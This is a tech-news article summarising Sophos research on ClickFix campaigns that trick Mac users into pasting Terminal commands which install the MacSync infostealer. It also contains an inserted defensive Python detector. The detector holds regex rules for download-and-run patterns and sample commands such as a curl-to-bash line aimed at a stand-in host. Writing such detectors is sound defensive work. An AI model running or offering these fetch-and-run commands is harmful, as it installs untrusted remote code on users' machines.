
'The prevailing wisdom used to be that macOS was at lower risk of malware infection compared to Windows...that’s no longer the case': Experts warn Mac infostealers are on the rise - here's how to stay safe | TechRadar

Three distinct campaigns targeting Mac recently spotted by Sophos


Fake AI tools, ChatGPT conversations, and Apple site used to spread MacSync infostealer

Latest variant employs loaders, AppleScript, and in‑memory execution for stealth

Security researchers have warned of a rise in ongoing malware campaigns targeting macOS users, leveraging malicious ads, legitimate hosting services, brand impersonation, fake ChatGPT conversations, and a little bit of old-fashioned social engineering to infect the victims.

A new report from Sophos claims there were at least three distinct ClickFix campaigns running over the last three months. ClickFix is a known method, in which crooks would present users with a fake problem and, at the same time, offer a solution - which can be anything from a fake CAPTCHA to a “locked” document.

Whatever it is, “solving” the problem requires running a Terminal command which downloads and installs the MacSync infostealer.
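A defender-side check for the download-and-run pattern described above, as an added example that is not from the article or the Sophos report. The heuristics and the sample commands are constructed assumptions, since the article does not reproduce the commands used in the campaigns.

```python
import re

# Assumed heuristics: shapes a pasted "fix" command takes when it downloads
# something and runs it immediately instead of saving it for inspection.
FETCH = r"\b(?:curl|wget)\b"
INTERP = r"(?:ba|z|da)?sh|python3?|perl|ruby|osascript"
RULES = [
    ("download piped into an interpreter",
     re.compile(rf"{FETCH}[^|;&]*\|\s*(?:sudo\s+)?(?:{INTERP})\b")),
    ("interpreter runs output of a download",
     re.compile(rf"\b(?:{INTERP})\b[^|;]*(?:\$\(|`|<\()\s*{FETCH}")),
    ("decoded blob piped into an interpreter",
     re.compile(rf"\bbase64\b[^|;&]*(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:{INTERP})\b")),
    ("inline AppleScript that shells out",
     re.compile(r"\bosascript\b.*\bdo shell script\b", re.I)),
]


def review_command(cmd: str) -> list[str]:
    """Return the reasons a pasted Terminal command looks like download-and-run."""
    # Join backslash line continuations and collapse whitespace so a command
    # split over several lines is judged as the single command the shell sees.
    flat = " ".join(cmd.replace("\\\n", " ").split())
    return [reason for reason, rx in RULES if rx.search(flat)]


# Constructed samples (example.invalid never resolves); not campaign data.
SAMPLES = [
    "curl -fsSL https://example.invalid/install.sh | bash",
    '/bin/zsh -c "$(curl -fsSL https://example.invalid/a)"',
    "echo QUJD | base64 -D | sh",
    "curl -O https://example.invalid/app.dmg",   # saves to disk only
    "brew install wget",                         # ordinary package install
]

if __name__ == "__main__":
    for sample in SAMPLES:
        reasons = review_command(sample)
        verdict = "REVIEW: " + "; ".join(reasons) if reasons else "ok"
        print(f"{verdict:55} {sample}")
```

The same function can be run over shell history or a help-desk ticket containing the command a user was told to paste; an empty result means only that none of these shapes matched, not that the command is safe.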


In the first campaign, the “problem” was installing an AI browser. Users searching for a specific keyword would see an ad at the top of the Google search results which would lead to a fake browser download page, hosted on sites.google.com.

The site looks authentic and spoofs OpenAI’s ChatGPT Atlas - but to download, users are told to bring up the Terminal and paste a specific command.

The second campaign is somewhat different because instead of relying on a website, the crooks would create a ChatGPT conversation.

Each conversation with the tool has a unique identifier, and it can be shared with other people using the “share” feature. Crooks would create a conversation that gave instructions for downloading “Mac system cleaner apps” and similar tools which, again, would trick victims into downloading the infostealer. Then, they would advertise that conversation on Google to improve the perceived legitimacy.

The third campaign described in the Sophos report impersonates the legitimate Apple site and delivers a significantly evolved variant of the MacSync infostealer. Unlike the earlier campaigns, this one uses a multistage loader-as-a-service model, dynamic AppleScript payloads, and in‑memory execution to maximize stealth and persistence.

“The prevailing wisdom used to be that macOS was at lower risk of malware infection compared to Windows, due to a native suite of security features that forced threat actors to adopt different, sometimes technically challenging, techniques,” the researchers explained.

“That’s no longer the case (and hasn’t been for some time, as we noted in September 2024). Mainstream malware now regularly affects macOS users – particularly when it comes to infostealers, which regularly account for a significant portion of all the macOS detections we see in telemetry. We expect this region of the threat landscape to keep evolving, and rapidly – but, as always, Sophos will evolve with it. We’ll continue to monitor for new variants, update protection and detection information as appropriate, and publish research on this aspect of the threat landscape as data becomes available.”


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
